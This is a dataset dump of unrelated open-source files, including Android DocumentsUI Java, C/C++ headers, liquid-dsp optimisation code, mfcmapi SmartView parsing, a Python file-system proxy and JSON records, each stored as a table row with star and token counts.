max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
2,151 | <filename>third_party/android_tools/sdk/sources/android-25/com/android/documentsui/dirlist/FragmentTuner.java
/*
* Copyright (C) 2015 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.documentsui.dirlist;
import static com.android.documentsui.State.ACTION_BROWSE;
import static com.android.documentsui.State.ACTION_CREATE;
import static com.android.documentsui.State.ACTION_GET_CONTENT;
import static com.android.documentsui.State.ACTION_OPEN;
import static com.android.documentsui.State.ACTION_OPEN_TREE;
import static com.android.documentsui.State.ACTION_PICK_COPY_DESTINATION;
import android.content.Context;
import android.provider.DocumentsContract.Document;
import android.view.Menu;
import android.view.MenuItem;
import com.android.documentsui.BaseActivity;
import com.android.documentsui.Menus;
import com.android.documentsui.MimePredicate;
import com.android.documentsui.R;
import com.android.documentsui.State;
import com.android.documentsui.dirlist.DirectoryFragment.ResultType;
/**
* Providers support for specializing the DirectoryFragment to the "host" Activity.
* Feel free to expand the role of this class to handle other specializations.
*/
public abstract class FragmentTuner {
final Context mContext;
final State mState;
public FragmentTuner(Context context, State state) {
mContext = context;
mState = state;
}
public static FragmentTuner pick(Context context, State state) {
switch (state.action) {
case ACTION_BROWSE:
return new FilesTuner(context, state);
default:
return new DocumentsTuner(context, state);
}
}
// Subtly different from isDocumentEnabled. The reason may be illuminated as follows.
// A folder is enabled such that it may be double clicked, even in settings
// when the folder itself cannot be selected. This may also be true of container types.
public boolean canSelectType(String docMimeType, int docFlags) {
return true;
}
public boolean isDocumentEnabled(String docMimeType, int docFlags) {
return true;
}
/**
* When managed mode is enabled, active downloads will be visible in the UI.
* Presumably this should only be true when in the downloads directory.
*/
boolean managedModeEnabled() {
return false;
}
/**
* Whether drag n' drop is allowed in this context
*/
boolean dragAndDropEnabled() {
return false;
}
abstract void updateActionMenu(Menu menu, SelectionDetails selection);
abstract void onModelLoaded(Model model, @ResultType int resultType, boolean isSearch);
/**
* Provides support for Platform specific specializations of DirectoryFragment.
*/
private static final class DocumentsTuner extends FragmentTuner {
// We use this to keep track of whether a model has been previously loaded or not so we can
// open the drawer on empty directories on first launch
private boolean mModelPreviousLoaded;
public DocumentsTuner(Context context, State state) {
super(context, state);
}
@Override
public boolean canSelectType(String docMimeType, int docFlags) {
if (!isDocumentEnabled(docMimeType, docFlags)) {
return false;
}
if (MimePredicate.isDirectoryType(docMimeType)) {
return false;
}
if (mState.action == ACTION_OPEN_TREE
|| mState.action == ACTION_PICK_COPY_DESTINATION) {
// In this case nothing *ever* is selectable...the expected user behavior is
// they navigate *into* a folder, then click a confirmation button indicating
// that the current directory is the directory they are picking.
return false;
}
return true;
}
@Override
public boolean isDocumentEnabled(String mimeType, int docFlags) {
// Directories are always enabled.
if (MimePredicate.isDirectoryType(mimeType)) {
return true;
}
switch (mState.action) {
case ACTION_CREATE:
// Read-only files are disabled when creating.
if ((docFlags & Document.FLAG_SUPPORTS_WRITE) == 0) {
return false;
}
case ACTION_OPEN:
case ACTION_GET_CONTENT:
final boolean isVirtual = (docFlags & Document.FLAG_VIRTUAL_DOCUMENT) != 0;
if (isVirtual && mState.openableOnly) {
return false;
}
}
return MimePredicate.mimeMatches(mState.acceptMimes, mimeType);
}
@Override
public void updateActionMenu(Menu menu, SelectionDetails selection) {
MenuItem open = menu.findItem(R.id.menu_open);
MenuItem share = menu.findItem(R.id.menu_share);
MenuItem delete = menu.findItem(R.id.menu_delete);
MenuItem rename = menu.findItem(R.id.menu_rename);
MenuItem selectAll = menu.findItem(R.id.menu_select_all);
open.setVisible(mState.action == ACTION_GET_CONTENT
|| mState.action == ACTION_OPEN);
share.setVisible(false);
delete.setVisible(false);
rename.setVisible(false);
selectAll.setVisible(mState.allowMultiple);
Menus.disableHiddenItems(menu);
}
@Override
void onModelLoaded(Model model, @ResultType int resultType, boolean isSearch) {
boolean showDrawer = false;
if (MimePredicate.mimeMatches(MimePredicate.VISUAL_MIMES, mState.acceptMimes)) {
showDrawer = false;
}
if (mState.external && mState.action == ACTION_GET_CONTENT) {
showDrawer = true;
}
if (mState.action == ACTION_PICK_COPY_DESTINATION) {
showDrawer = true;
}
// When launched into empty root, open drawer.
if (model.isEmpty()) {
showDrawer = true;
}
if (showDrawer && !mState.hasInitialLocationChanged() && !isSearch
&& !mModelPreviousLoaded) {
// This noops on layouts without drawer, so no need to guard.
((BaseActivity) mContext).setRootsDrawerOpen(true);
}
mModelPreviousLoaded = true;
}
}
/**
* Provides support for Files activity specific specializations of DirectoryFragment.
*/
private static final class FilesTuner extends FragmentTuner {
// We use this to keep track of whether a model has been previously loaded or not so we can
// open the drawer on empty directories on first launch
private boolean mModelPreviousLoaded;
public FilesTuner(Context context, State state) {
super(context, state);
}
@Override
public void updateActionMenu(Menu menu, SelectionDetails selection) {
menu.findItem(R.id.menu_open).setVisible(false); // "open" is never used in Files.
// Commands accessible only via keyboard...
MenuItem copy = menu.findItem(R.id.menu_copy_to_clipboard);
MenuItem paste = menu.findItem(R.id.menu_paste_from_clipboard);
// Commands visible in the UI...
MenuItem rename = menu.findItem(R.id.menu_rename);
MenuItem moveTo = menu.findItem(R.id.menu_move_to);
MenuItem copyTo = menu.findItem(R.id.menu_copy_to);
MenuItem share = menu.findItem(R.id.menu_share);
MenuItem delete = menu.findItem(R.id.menu_delete);
// copy is not visible, keyboard only
copy.setEnabled(!selection.containsPartialFiles());
// Commands usually on action-bar, so we always manage visibility.
share.setVisible(!selection.containsDirectories() && !selection.containsPartialFiles());
delete.setVisible(selection.canDelete());
share.setEnabled(!selection.containsDirectories() && !selection.containsPartialFiles());
delete.setEnabled(selection.canDelete());
// Commands always in overflow, so we don't bother showing/hiding...
copyTo.setVisible(true);
moveTo.setVisible(true);
rename.setVisible(true);
copyTo.setEnabled(!selection.containsPartialFiles());
moveTo.setEnabled(!selection.containsPartialFiles() && selection.canDelete());
rename.setEnabled(!selection.containsPartialFiles() && selection.canRename());
Menus.disableHiddenItems(menu, copy, paste);
}
@Override
void onModelLoaded(Model model, @ResultType int resultType, boolean isSearch) {
// When launched into empty root, open drawer.
if (model.isEmpty() && !mState.hasInitialLocationChanged() && !isSearch
&& !mModelPreviousLoaded) {
// This noops on layouts without drawer, so no need to guard.
((BaseActivity) mContext).setRootsDrawerOpen(true);
}
mModelPreviousLoaded = true;
}
@Override
public boolean managedModeEnabled() {
// When in downloads top level directory, we also show active downloads.
// And while we don't allow folders in Downloads, we do allow Zip files in
// downloads that themselves can be opened and viewed like directories.
// This method helps us understand when to kick in on those special behaviors.
return mState.stack.root != null
&& mState.stack.root.isDownloads()
&& mState.stack.size() == 1;
}
@Override
public boolean dragAndDropEnabled() {
return true;
}
}
/**
* Access to meta data about the selection.
*/
interface SelectionDetails {
boolean containsDirectories();
boolean containsPartialFiles();
// TODO: Update these to express characteristics instead of answering concrete questions,
// since the answer to those questions is (or can be) activity specific.
boolean canDelete();
boolean canRename();
}
}
| 4,462 |
4,047 | #include<gtest/gtest.h>
TEST(basic_test, eq_works) {
ASSERT_EQ(0, 1-1) << "Equality is broken. Mass panic!";
}
TEST(basic_test, neq_works) {
ASSERT_NE(15, 106) << "Inequal is equal. The foundations of space and time are in jeopardy.";
}
| 104 |
14,668 | // Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef ASH_PUBLIC_CPP_PAGINATION_PAGINATION_MODEL_OBSERVER_H_
#define ASH_PUBLIC_CPP_PAGINATION_PAGINATION_MODEL_OBSERVER_H_
#include "ash/public/cpp/ash_public_export.h"
namespace ash {
class ASH_PUBLIC_EXPORT PaginationModelObserver {
public:
// Invoked when the total number of page is changed.
virtual void TotalPagesChanged(int previous_page_count, int new_page_count) {}
// Invoked when the selected page index is changed.
virtual void SelectedPageChanged(int old_selected, int new_selected) {}
// Invoked right before a transition starts.
virtual void TransitionStarting() {}
// Invoked right after a transition started.
virtual void TransitionStarted() {}
// Invoked when the transition data is changed.
virtual void TransitionChanged() {}
// Invoked when a transition ends.
virtual void TransitionEnded() {}
// Invoked when a grid scroll starts.
virtual void ScrollStarted() {}
// Invoked when a grid scroll ends.
virtual void ScrollEnded() {}
protected:
virtual ~PaginationModelObserver() {}
};
} // namespace ash
#endif // ASH_PUBLIC_CPP_PAGINATION_PAGINATION_MODEL_OBSERVER_H_
| 402 |
1,078 | #ifndef AL_RWLOCK_H
#define AL_RWLOCK_H
#include "AL/al.h"
#include "atomic.h"
typedef struct {
volatile RefCount read_count;
volatile RefCount write_count;
volatile ALenum read_lock;
volatile ALenum read_entry_lock;
volatile ALenum write_lock;
} RWLock;
void RWLockInit(RWLock *lock);
void ReadLock(RWLock *lock);
void ReadUnlock(RWLock *lock);
void WriteLock(RWLock *lock);
void WriteUnlock(RWLock *lock);
#endif /* AL_RWLOCK_H */
| 174 |
1,382 | <reponame>vankxr/liquid-dsp
/*
* Copyright (c) 2007 - 2015 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
//
// optim.common.c
//
#include <stdio.h>
#include <stdlib.h>
#include "liquid.internal.h"
// optimization threshold switch
// _u0 : first utility
// _u1 : second utility
// _minimize : minimize flag
//
// returns:
// (_u0 > _u1) if (_minimize == 1)
// (_u0 < _u1) otherwise
int optim_threshold_switch(float _u0,
float _u1,
int _minimize)
{
return _minimize ? _u0 > _u1 : _u0 < _u1;
}
// sort values by index
// _v : input values [size: _len x 1]
// _rank : output rank array (indices) [size: _len x 1]
// _len : length of input array
// _descending : descending/ascending
void optim_sort(float *_v,
unsigned int * _rank,
unsigned int _len,
int _descending)
{
unsigned int i, j, tmp_index;
for (i=0; i<_len; i++)
_rank[i] = i;
for (i=0; i<_len; i++) {
for (j=_len-1; j>i; j--) {
//if (_v[_rank[j]]>_v[_rank[j-1]]) {
if ( optim_threshold_switch(_v[_rank[j]], _v[_rank[j-1]], _descending) ) {
// swap elements
tmp_index = _rank[j];
_rank[j] = _rank[j-1];
_rank[j-1] = tmp_index;
}
}
}
}
| 1,016 |
348 | {"nom":"Tréglonou","circ":"5ème circonscription","dpt":"Finistère","inscrits":500,"abs":253,"votants":247,"blancs":38,"nuls":14,"exp":195,"res":[{"nuance":"REM","nom":"<NAME>","voix":120},{"nuance":"DVD","nom":"<NAME>","voix":75}]} | 91 |
435 | <reponame>tianliangyihou/LBPhotoBrowser
//
// LBCell.h
// test
//
// Created by dengweihao on 2017/12/26.
// Copyright © 2017年 dengweihao. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "LBModel.h"
#define LB_WEAK_SELF __weak typeof(self)wself = self
static NSString *ID = @"lb.cell";
@interface LBCell : UITableViewCell
@property (nonatomic , strong)NSMutableArray *imageViews;
@property (nonatomic , strong)NSMutableArray *frames;
@property (nonatomic , strong)LBModel *model;
@property (nonatomic , copy)void (^callBack)(LBModel *cellModel, int tag);
@end
| 214 |
589 | package rocks.inspectit.ui.rcp.ci.testers;
import org.apache.commons.lang.ArrayUtils;
import org.eclipse.core.expressions.PropertyTester;
import rocks.inspectit.shared.cs.ci.business.impl.ApplicationDefinition;
import rocks.inspectit.shared.cs.ci.business.impl.BusinessTransactionDefinition;
import rocks.inspectit.ui.rcp.provider.IApplicationProvider;
/**
* Property tester for the business context.
*
* @author <NAME>
*
*/
public class BusinessContextTester extends PropertyTester {
/**
* Tester property for the default application.
*/
public static final String IS_DEFAULT_APP_PROPERTY = "isDefaultApplication";
/**
* Tester property for the default business transaction.
*/
public static final String IS_DEFAULT_BTX_PROPERTY = "isDefaultBusinessTransaction";
/**
* Tester property for the moving up capability.
*/
public static final String CAN_MOVE_UP_PROPERTY = "canMoveUp";
/**
* Tester property for the moving down capability.
*/
public static final String CAN_MOVE_DOWN_PROPERTY = "canMoveDown";
/**
* {@inheritDoc}
*/
@Override
public boolean test(Object receiver, String property, Object[] args, Object expectedValue) {
if (receiver instanceof IApplicationProvider) {
IApplicationProvider applicationProvider = (IApplicationProvider) receiver;
if (IS_DEFAULT_APP_PROPERTY.equals(property)) {
return applicationProvider.getApplication().getId() == ApplicationDefinition.DEFAULT_ID;
} else if (CAN_MOVE_UP_PROPERTY.equals(property)) {
return applicationProvider.getIndexInParentList() > 0;
} else if (CAN_MOVE_DOWN_PROPERTY.equals(property)) {
int listSize = applicationProvider.getParentList().size();
return applicationProvider.getIndexInParentList() < listSize - 2;
}
}
if (receiver instanceof BusinessTransactionDefinition) {
BusinessTransactionDefinition businessTransactionDef = (BusinessTransactionDefinition) receiver;
if (IS_DEFAULT_BTX_PROPERTY.equals(property)) {
return businessTransactionDef.getId() == BusinessTransactionDefinition.DEFAULT_ID;
} else if (CAN_MOVE_UP_PROPERTY.equals(property) && ArrayUtils.isNotEmpty(args) && args[0] instanceof ApplicationDefinition) {
return ((ApplicationDefinition) args[0]).getBusinessTransactionDefinitions().indexOf(businessTransactionDef) > 0;
} else if (CAN_MOVE_DOWN_PROPERTY.equals(property) && ArrayUtils.isNotEmpty(args) && args[0] instanceof ApplicationDefinition) {
int index = ((ApplicationDefinition) args[0]).getBusinessTransactionDefinitions().indexOf(businessTransactionDef);
return index >= 0 && index < ((ApplicationDefinition) args[0]).getBusinessTransactionDefinitions().size() - 2;
}
}
return false;
}
}
| 832 |
655 | <filename>core/smartview/SearchFolderDefinition.cpp
#include <core/stdafx.h>
#include <core/smartview/SearchFolderDefinition.h>
#include <core/smartview/RestrictionStruct.h>
#include <core/smartview/PropertiesStruct.h>
#include <core/mapi/extraPropTags.h>
#include <core/smartview/SmartView.h>
namespace smartview
{
void AddressListEntryStruct::parse()
{
PropertyCount = blockT<DWORD>::parse(parser);
Pad = blockT<DWORD>::parse(parser);
if (*PropertyCount)
{
Props = std::make_shared<PropertiesStruct>(*PropertyCount, false, false);
Props->block::parse(parser, false);
}
}
void AddressListEntryStruct::parseBlocks()
{
addChild(PropertyCount, L"PropertyCount = 0x%1!08X!", PropertyCount->getData());
addChild(Pad, L"Pad = 0x%1!08X!", Pad->getData());
addChild(Props, L"Properties");
}
void SearchFolderDefinition::parse()
{
m_Version = blockT<DWORD>::parse(parser);
m_Flags = blockT<DWORD>::parse(parser);
m_NumericSearch = blockT<DWORD>::parse(parser);
m_TextSearchLength = blockT<BYTE>::parse(parser);
size_t cchTextSearch = *m_TextSearchLength;
if (*m_TextSearchLength == 255)
{
m_TextSearchLengthExtended = blockT<WORD>::parse(parser);
cchTextSearch = *m_TextSearchLengthExtended;
}
if (cchTextSearch)
{
m_TextSearch = blockStringW::parse(parser, cchTextSearch);
}
m_SkipLen1 = blockT<DWORD>::parse(parser);
m_SkipBytes1 = blockBytes::parse(parser, *m_SkipLen1, _MaxBytes);
m_DeepSearch = blockT<DWORD>::parse(parser);
m_FolderList1Length = blockT<BYTE>::parse(parser);
size_t cchFolderList1 = *m_FolderList1Length;
if (*m_FolderList1Length == 255)
{
m_FolderList1LengthExtended = blockT<WORD>::parse(parser);
cchFolderList1 = *m_FolderList1LengthExtended;
}
if (cchFolderList1)
{
m_FolderList1 = blockStringW::parse(parser, cchFolderList1);
}
m_FolderList2Length = blockT<DWORD>::parse(parser);
if (m_FolderList2Length)
{
m_FolderList2 = block::parse<EntryList>(parser, *m_FolderList2Length, true);
}
if (*m_Flags & SFST_BINARY)
{
m_AddressCount = blockT<DWORD>::parse(parser);
if (*m_AddressCount)
{
if (*m_AddressCount < _MaxEntriesSmall)
{
m_Addresses.reserve(*m_AddressCount);
for (DWORD i = 0; i < *m_AddressCount; i++)
{
m_Addresses.emplace_back(block::parse<AddressListEntryStruct>(parser, false));
}
}
}
}
m_SkipLen2 = blockT<DWORD>::parse(parser);
m_SkipBytes2 = blockBytes::parse(parser, *m_SkipLen2, _MaxBytes);
if (*m_Flags & SFST_MRES)
{
m_Restriction = std::make_shared<RestrictionStruct>(false, true);
m_Restriction->block::parse(parser, false);
}
if (*m_Flags & SFST_FILTERSTREAM)
{
const auto cbRemainingBytes = parser->getSize();
// Since the format for SFST_FILTERSTREAM isn't documented, just assume that everything remaining
// is part of this bucket. We leave DWORD space for the final skip block, which should be empty
if (cbRemainingBytes > sizeof DWORD)
{
m_AdvancedSearchBytes = blockBytes::parse(parser, cbRemainingBytes - sizeof DWORD);
}
}
m_SkipLen3 = blockT<DWORD>::parse(parser);
if (m_SkipLen3)
{
m_SkipBytes3 = blockBytes::parse(parser, *m_SkipLen3, _MaxBytes);
}
}
void SearchFolderDefinition::parseBlocks()
{
setText(L"Search Folder Definition");
addChild(m_Version, L"Version = 0x%1!08X!", m_Version->getData());
addChild(
m_Flags,
L"Flags = 0x%1!08X! = %2!ws!",
m_Flags->getData(),
InterpretNumberAsStringProp(*m_Flags, PR_WB_SF_STORAGE_TYPE).c_str());
addChild(m_NumericSearch, L"Numeric Search = 0x%1!08X!", m_NumericSearch->getData());
addChild(m_TextSearchLength, L"Text Search Length = 0x%1!02X!", m_TextSearchLength->getData());
if (*m_TextSearchLength)
{
addChild(
m_TextSearchLengthExtended,
L"Text Search Length Extended = 0x%1!04X!",
m_TextSearchLengthExtended->getData());
addLabeledChild(L"Text Search", m_TextSearch);
}
addChild(m_SkipLen1, L"SkipLen1 = 0x%1!08X!", m_SkipLen1->getData());
if (*m_SkipLen1)
{
addLabeledChild(L"SkipBytes1", m_SkipBytes1);
}
addChild(m_DeepSearch, L"Deep Search = 0x%1!08X!", m_DeepSearch->getData());
addChild(m_FolderList1Length, L"Folder List 1 Length = 0x%1!02X!", m_FolderList1Length->getData());
if (*m_FolderList1Length)
{
addChild(
m_FolderList1LengthExtended,
L"Folder List 1 Length Extended = 0x%1!04X!",
m_FolderList1LengthExtended->getData());
addLabeledChild(L"Folder List 1", m_FolderList1);
}
addChild(m_FolderList2Length, L"Folder List 2 Length = 0x%1!08X!", m_FolderList2Length->getData());
if (m_FolderList2)
{
addLabeledChild(L"Folder List2", m_FolderList2);
}
if (*m_Flags & SFST_BINARY)
{
addChild(m_AddressCount, L"AddressCount = 0x%1!08X!", m_AddressCount->getData());
auto i = DWORD{};
for (const auto& address : m_Addresses)
{
addChild(address, L"Addresses[%1!d!]", i);
i++;
}
}
addChild(m_SkipLen2, L"SkipLen2 = 0x%1!08X!", m_SkipLen2->getData());
addLabeledChild(L"SkipBytes2", m_SkipBytes2);
if (m_Restriction && m_Restriction->hasData())
{
addChild(m_Restriction);
}
if (*m_Flags & SFST_FILTERSTREAM)
{
addHeader(L"AdvancedSearchLen = 0x%1!08X!", m_AdvancedSearchBytes->size());
if (!m_AdvancedSearchBytes->empty())
{
addLabeledChild(L"AdvancedSearchBytes", m_AdvancedSearchBytes);
}
}
addChild(m_SkipLen3, L"SkipLen3 = 0x%1!08X!", m_SkipLen3->getData());
addLabeledChild(L"SkipBytes3", m_SkipBytes3);
}
} // namespace smartview | 2,298 |
66,985 | /*
* Copyright 2012-2019 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot;
import org.junit.jupiter.api.Test;
import org.springframework.beans.factory.config.BeanDefinition;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.mock;
/**
* Tests for {@link LazyInitializationExcludeFilter}.
*
* @author <NAME>
*/
class LazyInitializationExcludeFilterTests {
@Test
void forBeanTypesMatchesTypes() {
LazyInitializationExcludeFilter filter = LazyInitializationExcludeFilter.forBeanTypes(CharSequence.class,
Number.class);
String beanName = "test";
BeanDefinition beanDefinition = mock(BeanDefinition.class);
assertThat(filter.isExcluded(beanName, beanDefinition, CharSequence.class)).isTrue();
assertThat(filter.isExcluded(beanName, beanDefinition, String.class)).isTrue();
assertThat(filter.isExcluded(beanName, beanDefinition, StringBuilder.class)).isTrue();
assertThat(filter.isExcluded(beanName, beanDefinition, Number.class)).isTrue();
assertThat(filter.isExcluded(beanName, beanDefinition, Long.class)).isTrue();
assertThat(filter.isExcluded(beanName, beanDefinition, Boolean.class)).isFalse();
}
}
| 522 |
4,054 | /*
* Copyright (c) 2019 BestSolution.at and others.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* <NAME> <<EMAIL>> - initial API and implementation
*/
#include <DriftFX/Context.h>
using namespace driftfx;
Context::Context() {
}
Context::~Context() {
}
Texture* Context::CreateTexture(int width, int height) {
return 0;
}
| 167 |
1,848 | <gh_stars>1000+
// bindgen-flags: --rustified-enum ".*"
/**
* Stores a pointer to the ops struct, and the offset: the place to
* write the parsed result in the destination structure.
*/
struct cmdline_token_hdr {
struct cmdline_token_ops *ops;
unsigned int offset;
};
typedef struct cmdline_token_hdr cmdline_parse_token_hdr_t;
/**
* A token is defined by this structure.
*
* parse() takes the token as first argument, then the source buffer
* starting at the token we want to parse. The 3rd arg is a pointer
* where we store the parsed data (as binary). It returns the number of
* parsed chars on success and a negative value on error.
*
* complete_get_nb() returns the number of possible values for this
* token if completion is possible. If it is NULL or if it returns 0,
* no completion is possible.
*
* complete_get_elt() copy in dstbuf (the size is specified in the
* parameter) the i-th possible completion for this token. returns 0
* on success or and a negative value on error.
*
* get_help() fills the dstbuf with the help for the token. It returns
* -1 on error and 0 on success.
*/
struct cmdline_token_ops {
/** parse(token ptr, buf, res pts, buf len) */
int (*parse)(cmdline_parse_token_hdr_t *, const char *, void *,
unsigned int);
/** return the num of possible choices for this token */
int (*complete_get_nb)(cmdline_parse_token_hdr_t *);
/** return the elt x for this token (token, idx, dstbuf, size) */
int (*complete_get_elt)(cmdline_parse_token_hdr_t *, int, char *,
unsigned int);
/** get help for this token (token, dstbuf, size) */
int (*get_help)(cmdline_parse_token_hdr_t *, char *, unsigned int);
};
enum cmdline_numtype {
UINT8 = 0,
UINT16,
UINT32,
UINT64,
INT8,
INT16,
INT32,
INT64
};
struct cmdline_token_num_data {
enum cmdline_numtype type;
};
struct cmdline_token_num {
struct cmdline_token_hdr hdr;
struct cmdline_token_num_data num_data;
};
typedef struct cmdline_token_num cmdline_parse_token_num_t;
| 654 |
771 | <reponame>revolunet/tiny-helpers
{
"name": "Lighthouse CI Diff",
"desc": "Compare two Lighthouse reports",
"url": "https://googlechrome.github.io/lighthouse-ci/viewer/",
"tags": [
"Performance"
],
"maintainers": [],
"addedAt": "2021-01-09"
}
| 105 |
2,757 | """File System Proxy.
Provide an OS-neutral view on a file system, locally or remotely.
The functionality is geared towards implementing some sort of
rdist-like utility between a Mac and a UNIX system.
The module defines three classes:
FSProxyLocal -- used for local access
FSProxyServer -- used on the server side of remote access
FSProxyClient -- used on the client side of remote access
The remote classes are instantiated with an IP address and an optional
verbosity flag.
"""
import server
import client
import md5
import os
import fnmatch
from stat import *
import time
import fnmatch
maxnamelen = 255
skipnames = (os.curdir, os.pardir)
class FSProxyLocal:
def __init__(self):
self._dirstack = []
self._ignore = ['*.pyc'] + self._readignore()
def _close(self):
while self._dirstack:
self.back()
def _readignore(self):
file = self._hide('ignore')
try:
f = open(file)
except IOError:
file = self._hide('synctree.ignorefiles')
try:
f = open(file)
except IOError:
return []
ignore = []
while 1:
line = f.readline()
if not line: break
if line[-1] == '\n': line = line[:-1]
ignore.append(line)
f.close()
return ignore
def _hidden(self, name):
return name[0] == '.'
def _hide(self, name):
return '.%s' % name
def visible(self, name):
if len(name) > maxnamelen: return 0
if name[-1] == '~': return 0
if name in skipnames: return 0
if self._hidden(name): return 0
head, tail = os.path.split(name)
if head or not tail: return 0
if os.path.islink(name): return 0
if '\0' in open(name, 'rb').read(512): return 0
for ign in self._ignore:
if fnmatch.fnmatch(name, ign): return 0
return 1
def check(self, name):
if not self.visible(name):
raise os.error, "protected name %s" % repr(name)
def checkfile(self, name):
self.check(name)
if not os.path.isfile(name):
raise os.error, "not a plain file %s" % repr(name)
def pwd(self):
return os.getcwd()
def cd(self, name):
self.check(name)
save = os.getcwd(), self._ignore
os.chdir(name)
self._dirstack.append(save)
self._ignore = self._ignore + self._readignore()
def back(self):
if not self._dirstack:
raise os.error, "empty directory stack"
dir, ignore = self._dirstack[-1]
os.chdir(dir)
del self._dirstack[-1]
self._ignore = ignore
def _filter(self, files, pat = None):
if pat:
def keep(name, pat = pat):
return fnmatch.fnmatch(name, pat)
files = filter(keep, files)
files = filter(self.visible, files)
files.sort()
return files
def list(self, pat = None):
files = os.listdir(os.curdir)
return self._filter(files, pat)
def listfiles(self, pat = None):
files = os.listdir(os.curdir)
files = filter(os.path.isfile, files)
return self._filter(files, pat)
def listsubdirs(self, pat = None):
files = os.listdir(os.curdir)
files = filter(os.path.isdir, files)
return self._filter(files, pat)
def exists(self, name):
return self.visible(name) and os.path.exists(name)
def isdir(self, name):
return self.visible(name) and os.path.isdir(name)
def islink(self, name):
return self.visible(name) and os.path.islink(name)
def isfile(self, name):
return self.visible(name) and os.path.isfile(name)
def sum(self, name):
self.checkfile(name)
BUFFERSIZE = 1024*8
f = open(name)
sum = md5.new()
while 1:
buffer = f.read(BUFFERSIZE)
if not buffer:
break
sum.update(buffer)
return sum.digest()
def size(self, name):
self.checkfile(name)
return os.stat(name)[ST_SIZE]
def mtime(self, name):
self.checkfile(name)
return time.localtime(os.stat(name)[ST_MTIME])
def stat(self, name):
self.checkfile(name)
size = os.stat(name)[ST_SIZE]
mtime = time.localtime(os.stat(name)[ST_MTIME])
return size, mtime
def info(self, name):
sum = self.sum(name)
size = os.stat(name)[ST_SIZE]
mtime = time.localtime(os.stat(name)[ST_MTIME])
return sum, size, mtime
def _list(self, function, list):
if list is None:
list = self.listfiles()
res = []
for name in list:
try:
res.append((name, function(name)))
except (os.error, IOError):
res.append((name, None))
return res
def sumlist(self, list = None):
return self._list(self.sum, list)
def statlist(self, list = None):
return self._list(self.stat, list)
def mtimelist(self, list = None):
return self._list(self.mtime, list)
def sizelist(self, list = None):
return self._list(self.size, list)
def infolist(self, list = None):
return self._list(self.info, list)
def _dict(self, function, list):
if list is None:
list = self.listfiles()
dict = {}
for name in list:
try:
dict[name] = function(name)
except (os.error, IOError):
pass
return dict
def sumdict(self, list = None):
return self.dict(self.sum, list)
def sizedict(self, list = None):
return self.dict(self.size, list)
def mtimedict(self, list = None):
return self.dict(self.mtime, list)
def statdict(self, list = None):
return self.dict(self.stat, list)
def infodict(self, list = None):
return self._dict(self.info, list)
def read(self, name, offset = 0, length = -1):
self.checkfile(name)
f = open(name)
f.seek(offset)
if length == 0:
data = ''
elif length < 0:
data = f.read()
else:
data = f.read(length)
f.close()
return data
def create(self, name):
self.check(name)
if os.path.exists(name):
self.checkfile(name)
bname = name + '~'
try:
os.unlink(bname)
except os.error:
pass
os.rename(name, bname)
f = open(name, 'w')
f.close()
def write(self, name, data, offset = 0):
self.checkfile(name)
f = open(name, 'r+')
f.seek(offset)
f.write(data)
f.close()
def mkdir(self, name):
self.check(name)
os.mkdir(name, 0777)
def rmdir(self, name):
self.check(name)
os.rmdir(name)
class FSProxyServer(FSProxyLocal, server.Server):
def __init__(self, address, verbose = server.VERBOSE):
FSProxyLocal.__init__(self)
server.Server.__init__(self, address, verbose)
def _close(self):
server.Server._close(self)
FSProxyLocal._close(self)
def _serve(self):
server.Server._serve(self)
# Retreat into start directory
while self._dirstack: self.back()
class FSProxyClient(client.Client):
def __init__(self, address, verbose = client.VERBOSE):
client.Client.__init__(self, address, verbose)
def test():
import string
import sys
if sys.argv[1:]:
port = string.atoi(sys.argv[1])
else:
port = 4127
proxy = FSProxyServer(('', port))
proxy._serverloop()
if __name__ == '__main__':
test()
| 4,037 |
521 | #ifndef HASHTABLE_H
#define HASHTABLE_H 1
#include <dix-config.h>
#include <X11/Xfuncproto.h>
#include <X11/Xdefs.h>
#include "list.h"
/** @brief A hashing function.
@param[in/out] cdata Opaque data that can be passed to HtInit that will
eventually end up here
@param[in] ptr The data to be hashed. The size of the data, if
needed, can be configured via a record that can be
passed via cdata.
@param[in] numBits The number of bits this hash needs to have in the
resulting hash
@return A numBits-bit hash of the data
*/
typedef unsigned (*HashFunc)(void * cdata, const void * ptr, int numBits);
/** @brief A comparison function for hashed keys.
@param[in/out] cdata Opaque data that ca be passed to Htinit that will
